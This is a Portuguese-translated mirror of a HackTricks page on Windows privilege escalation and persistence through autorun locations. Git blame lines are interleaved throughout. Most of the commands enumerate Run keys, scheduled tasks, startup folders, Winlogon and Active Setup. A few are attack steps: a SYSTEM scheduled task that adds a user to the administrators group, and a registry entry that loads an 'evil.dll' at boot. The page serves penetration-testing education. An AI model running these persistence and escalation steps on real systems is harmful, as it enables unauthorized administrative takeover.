Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 17:16:10 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md

353 lines
25 KiB
Markdown
Raw Normal View History

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
# Elevação de Privilégios com Autoruns
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
<summary>Support HackTricks</summary>
Translated ['windows-hardening/active-directory-methodology/README.md',
2024-01-02 21:38:50 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de **bug bounty criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100,000**!
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file
2024-02-18 14:44:37 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
## WMIC
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-01-10 07:09:16 +00:00
**Wmic** pode ser usado para executar programas na **inicialização**. Veja quais binários estão programados para serem executados na inicialização com:
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
```bash
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Tarefas Agendadas
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
**Tarefas** podem ser agendadas para serem executadas com **certa frequência**. Veja quais binários estão agendados para serem executados com:
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
```bash
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
GitBook: [master] 360 pages modified
2020-08-17 14:38:36 +00:00
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
GitBook: [master] 380 pages modified
2020-10-22 16:22:49 +00:00
#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Pastas
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Todos os binários localizados nas **pastas de Inicialização serão executados na inicialização**. As pastas de inicialização comuns são as listadas a seguir, mas a pasta de inicialização é indicada no registro. [Leia isso para aprender onde.](privilege-escalation-with-autorun-binaries.md#startup-path)
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
```bash
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
## Registro
GitBook: [master] 2 pages modified
2020-08-05 22:33:19 +00:00
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
{% hint style="info" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
[Nota a partir daqui](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): A entrada de registro **Wow6432Node** indica que você está executando uma versão do Windows de 64 bits. O sistema operacional usa essa chave para exibir uma visão separada de HKEY\_LOCAL\_MACHINE\SOFTWARE para aplicativos de 32 bits que são executados em versões do Windows de 64 bits.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
{% endhint %}
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Execuções
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
**Registro AutoRun** comumente conhecido:
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
As chaves de registro conhecidas como **Run** e **RunOnce** são projetadas para executar automaticamente programas toda vez que um usuário faz login no sistema. A linha de comando atribuída como valor de dados de uma chave é limitada a 260 caracteres ou menos.
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated to Portuguese
2023-06-06 18:56:34 +00:00
**Execuções de serviço** (podem controlar a inicialização automática de serviços durante a inicialização):
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
* `HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices`
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
**RunOnceEx:**
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
* `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
No Windows Vista e versões posteriores, as chaves de registro **Run** e **RunOnce** não são geradas automaticamente. As entradas nessas chaves podem iniciar programas diretamente ou especificá-los como dependências. Por exemplo, para carregar um arquivo DLL no logon, pode-se usar a chave de registro **RunOnceEx** junto com uma chave "Depend". Isso é demonstrado adicionando uma entrada de registro para executar "C:\temp\evil.dll" durante a inicialização do sistema:
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
```
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
```
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
{% hint style="info" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
**Exploit 1**: Se você puder escrever dentro de qualquer um dos registros mencionados dentro de **HKLM**, você pode escalar privilégios quando um usuário diferente fizer login.
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
{% endhint %}
{% hint style="info" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
**Exploit 2**: Se você puder sobrescrever qualquer um dos binários indicados em qualquer um dos registros dentro de **HKLM**, você pode modificar esse binário com um backdoor quando um usuário diferente fizer login e escalar privilégios.
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
{% endhint %}
```bash
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
#CMD
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
#PowerShell
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
GitBook: [master] 356 pages modified
2020-08-05 21:47:51 +00:00
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Caminho de Inicialização
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Atalhos colocados na pasta **Inicialização** irão automaticamente acionar serviços ou aplicativos para serem iniciados durante o logon do usuário ou a reinicialização do sistema. A localização da pasta **Inicialização** é definida no registro para os escopos de **Máquina Local** e **Usuário Atual**. Isso significa que qualquer atalho adicionado a esses locais de **Inicialização** especificados garantirá que o serviço ou programa vinculado seja iniciado após o processo de logon ou reinicialização, tornando-se um método simples para agendar programas para serem executados automaticamente.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
{% hint style="info" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Se você puder sobrescrever qualquer \[User] Shell Folder sob **HKLM**, você poderá apontá-lo para uma pasta controlada por você e colocar um backdoor que será executado sempre que um usuário fizer login no sistema, escalando privilégios.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
{% endhint %}
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
```bash
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
### Winlogon Keys
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Normalmente, a chave **Userinit** é definida como **userinit.exe**. No entanto, se essa chave for modificada, o executável especificado também será iniciado pelo **Winlogon** ao fazer login do usuário. Da mesma forma, a chave **Shell** deve apontar para **explorer.exe**, que é o shell padrão do Windows.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
```bash
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
```
{% hint style="info" %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Se você puder sobrescrever o valor do registro ou o binário, conseguirá escalar privilégios.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
{% endhint %}
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Configurações de Política
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
Translated to Portuguese
2023-06-06 18:56:34 +00:00
Verifique a chave **Run**.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
```bash
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
```
GitBook: [#3220] No subject
2022-05-24 00:07:19 +00:00
### AlternateShell
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
### Mudando o Prompt de Comando do Modo Seguro
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
No Registro do Windows em `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, há um valor **`AlternateShell`** definido por padrão como `cmd.exe`. Isso significa que, ao escolher "Modo Seguro com Prompt de Comando" durante a inicialização (pressionando F8), `cmd.exe` é utilizado. Mas, é possível configurar seu computador para iniciar automaticamente neste modo sem precisar pressionar F8 e selecioná-lo manualmente.
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Passos para criar uma opção de inicialização para iniciar automaticamente em "Modo Seguro com Prompt de Comando":
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
1. Altere os atributos do arquivo `boot.ini` para remover as flags de somente leitura, sistema e oculto: `attrib c:\boot.ini -r -s -h`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
2. Abra `boot.ini` para edição.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
3. Insira uma linha como: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
4. Salve as alterações em `boot.ini`.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
5. Reaplique os atributos originais do arquivo: `attrib c:\boot.ini +r +s +h`
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* **Exploit 1:** Alterar a chave de registro **AlternateShell** permite a configuração de um shell de comando personalizado, potencialmente para acesso não autorizado.
* **Exploit 2 (Permissões de Escrita no PATH):** Ter permissões de escrita em qualquer parte da variável **PATH** do sistema, especialmente antes de `C:\Windows\system32`, permite que você execute um `cmd.exe` personalizado, que pode ser uma porta dos fundos se o sistema for iniciado em Modo Seguro.
* **Exploit 3 (Permissões de Escrita no PATH e boot.ini):** O acesso de escrita ao `boot.ini` permite a inicialização automática do Modo Seguro, facilitando o acesso não autorizado na próxima reinicialização.
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Para verificar a configuração atual de **AlternateShell**, use estes comandos:
GitBook: [master] 2 pages modified
2020-08-04 22:50:29 +00:00
```bash
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
```
Translated to Portuguese
2023-06-06 18:56:34 +00:00
### Componente Instalado
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Active Setup é um recurso no Windows que **inicia antes que o ambiente de desktop esteja totalmente carregado**. Ele prioriza a execução de certos comandos, que devem ser concluídos antes que o logon do usuário prossiga. Esse processo ocorre mesmo antes que outras entradas de inicialização, como aquelas nas seções de registro Run ou RunOnce, sejam acionadas.
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Active Setup é gerenciado através das seguintes chaves de registro:
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
* `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
* `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
* `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Dentro dessas chaves, existem várias subchaves, cada uma correspondendo a um componente específico. Os valores-chave de particular interesse incluem:
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* **IsInstalled:**
* `0` indica que o comando do componente não será executado.
* `1` significa que o comando será executado uma vez para cada usuário, que é o comportamento padrão se o valor `IsInstalled` estiver ausente.
* **StubPath:** Define o comando a ser executado pelo Active Setup. Pode ser qualquer linha de comando válida, como iniciar o `notepad`.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
**Insights de Segurança:**
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
* Modificar ou escrever em uma chave onde **`IsInstalled`** está definido como `"1"` com um **`StubPath`** específico pode levar à execução não autorizada de comandos, potencialmente para escalonamento de privilégios.
* Alterar o arquivo binário referenciado em qualquer valor de **`StubPath`** também poderia alcançar escalonamento de privilégios, dado permissões suficientes.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Para inspecionar as configurações de **`StubPath`** nos componentes do Active Setup, esses comandos podem ser usados:
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
```bash
Update privilege-escalation-with-autorun-binaries.md add missing keyword `reg` for command `reg query`
2020-10-12 16:19:17 +00:00
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
GitBook: [master] 357 pages modified
2020-08-05 16:26:55 +00:00
```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
### Objetos Auxiliares do Navegador
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
### Visão Geral dos Objetos Auxiliares do Navegador (BHOs)
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA
2024-07-19 16:04:21 +00:00
Os Objetos Auxiliares do Navegador (BHOs) são módulos DLL que adicionam recursos extras ao Internet Explorer da Microsoft. Eles são carregados no Internet Explorer e no Windows Explorer a cada inicialização. No entanto, sua execução pode ser bloqueada definindo a chave **NoExplorer** como 1, impedindo que sejam carregados com instâncias do Windows Explorer.
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge
2024-02-08 03:54:17 +00:00
